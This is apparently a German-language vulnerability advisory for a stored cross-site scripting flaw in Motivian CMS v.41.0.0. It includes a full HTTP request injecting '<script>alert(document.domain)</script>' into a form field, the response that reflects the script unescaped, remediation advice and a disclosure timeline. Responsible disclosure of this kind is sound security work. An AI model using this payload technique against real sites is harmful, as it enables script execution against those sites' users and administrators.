
Dieses Repository zeigt eine Sicherheitslücke, die im Motivian Content Management System v.41.0.0 entdeckt wurde.
Dieses Repository zeigt eine Sicherheitslücke im Motivian Content Management System v.41.0.0.
Diese Schwachstelle wurde gemäß den Praktiken der verantwortungsvollen Offenlegung an den Hersteller sowie an MITRE gemeldet, die eine vorläufige CVE-ID zugewiesen hat. Die Details werden nach Ablauf der 45-tägigen Offenlegungsfrist veröffentlicht.
Marketing/Forms, Marketing/Offers, Content/PagesEine Cross-Site-Scripting-Schwachstelle im Motivian Content Mangment System v.41.0.0 ermöglicht es einem entfernten Angreifer, beliebigen Code über die Komponenten Marketing/Forms, Marketing/Offers und Content/Pages auszuführen. Die Schwachstelle wurde durch die Einschleusung von bösartigem JavaScript-Code in verschiedene Felder ausgenutzt, darunter den Titel in Marketing/Form und Marketing/Offers sowie das Feld Header Script in Content/Pages
Die Schwachstelle kann über verschiedene Felder in unterschiedlichen Komponenten ausgenutzt werden. Zu Demonstrationszwecken konzentriert sich der folgende Proof of Concept auf ein bestimmtes Szenario:
Marketing/Forms und erstellen Sie ein neues Formularelement.Nachfolgend die vollständige Aufzeichnung der HTTP-Anfragen und -Antworten, die zur Demonstration des Problems verwendet wurden:
POST /portal/admin/formbuilder/editCmsFormProps!saveForm.action HTTP/1.1
Host: [REDACTED]
Content-Length: 1362
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.134 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: [REDACTED]
Connection: close
targetFieldId=&targetFormId=&targetFieldIndex=&openedTabProps=tab1&langSelected=it&form.id=1162&search_form_id=&search_form_status_id=&search_form_name=&search_form_description=&date_from=&date_to=¤tPage=&struts.token.name=EditCmsFormProps&EditCmsFormProps=DBFW4RH1O9SVF1J3J9TA0WSD5VHPJCKY&date_notification=&form.seoName_en=&form.seoName_el=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&[...]
HTTP/1.1 200 OK
Connection: close
Date: Wed, 05 Feb 2025 12:00:09 GMT
Content-Type: text/html;charset=ISO-8859-1
Content-Language: it-IT
Content-Length: 94593
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head> <title>MOTIVIAN | Content Management</title> <link rel="shortcut icon" type="image/x-icon" href="/portal/favicon.ico"/> <link rel="icon" type="image/x-icon" href="/portal/favicon.ico"/> <script> <a href="javascript:void(0)" class="sortingRow" onclick="javascript:simplePagesFormDoSort('status','asc')" >Status</a></td> <td class="TableHeader" colspan="9" style="width:188px">Management</td> <td class="TableHeader w10"> </td> </tr> </table> </td> </tr> <tr> <td class="w10 row_odd"> </td> <td class="w70 row_odd"> <div class="check-box w70" style="float:left"> <input type="checkbox" id="subpages_formIds_id_1162" name="formIds" value="1162"> <label for="subpages_formIds_id_1162">1162 </label> </div> </td> <td class="w40 row_odd"><img src="https://raw.githubusercontent.com/framarcuccio/cve-2025-29094-multiple-stored-cross-site-scripting-xss/main/portal/assets/images/red_form.png"/></td> <td class="NameCol row_odd"> <div class="wrap_words_within_rows w155"><script>alert(document.domain)</script> [...]
Bereinigen Sie sämtliche Benutzereingaben und escapen Sie die Ausgabe vor der Darstellung. Implementieren Sie einen CSP-Header (Content Security Policy), um XSS-Risiken zu mindern.
| Datum | Aktion |
|---|---|
| 2025-02-06 | CVE-ID-Anfrage (CNA: MITRE) |
| 2025-04-02 | CVE-ID-Zuweisung |
| 2025-04-07 | Schwachstellen an Hersteller gemeldet |
| 2025-05-31 | Öffentliche Offenlegung nach Ablauf der 45-tägigen Offenlegungsfrist (insgesamt 54 Tage) |
| 2025-06-04 | Offizielle Registrierung und Eintrag in der MITRE-Datenbank und im NIST/NVD-Portal |
Entdeckt und verantwortungsvoll offengelegt von:
Francesco Marcuccio
CyberSecurity-Berater, Penetrationstester
Die MITRE-Entdeckerzuordnung lautet:
Francesco Marcuccio
CyberSecurity-Berater, Penetrationstester
Diese CVE-ID befindet sich offiziell im Status VERÖFFENTLICHT. Sie wird nach der Analyse von NIST mit einem CVSS-Score aktualisiert.